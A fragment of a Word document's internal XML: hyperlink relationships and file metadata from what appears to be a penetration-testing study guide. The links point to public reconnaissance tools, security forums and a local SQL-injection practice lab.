Target="https://www.bilibili.com/video/av88459896?from=search&amp;seid=12563701269010581597" TargetMode="External"/><Relationship Id="rId10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bbs.ichunqiu.com/forum.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shmilylty/OneForAll" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/7kbstorm/7kbscan-WebPathBrute" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnableSecurity/wafw00f" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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8.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/19206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ools.ipip.net/dns.php" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=Windows&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.51cto.com/wt7315/1865580" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.ichunqiu.com/thread-54849-1-1.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lijiejie/subDomainsBrute" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/3xp10it/xcdn" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ekultek/WhatWaf" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/video/av33026520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ichunqiu.com/battalion?t=2&amp;r=54399" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maurosoria/dirsearch" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.t00ls.net/articles-46165.html" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.dyboy.cn/websecurity/160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stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=2K&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhida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5008-6BA3-43B1-B060-9E9784D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3</TotalTime>
  <Pages>32</Pages>
  <Words>3265</Words>
  <Characters>18617</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>155</Lines>
  <Paragraphs>43</Paragraphs>
  <ScaleCrop>false</ScaleCrop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u feng</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-12T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-25T03:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>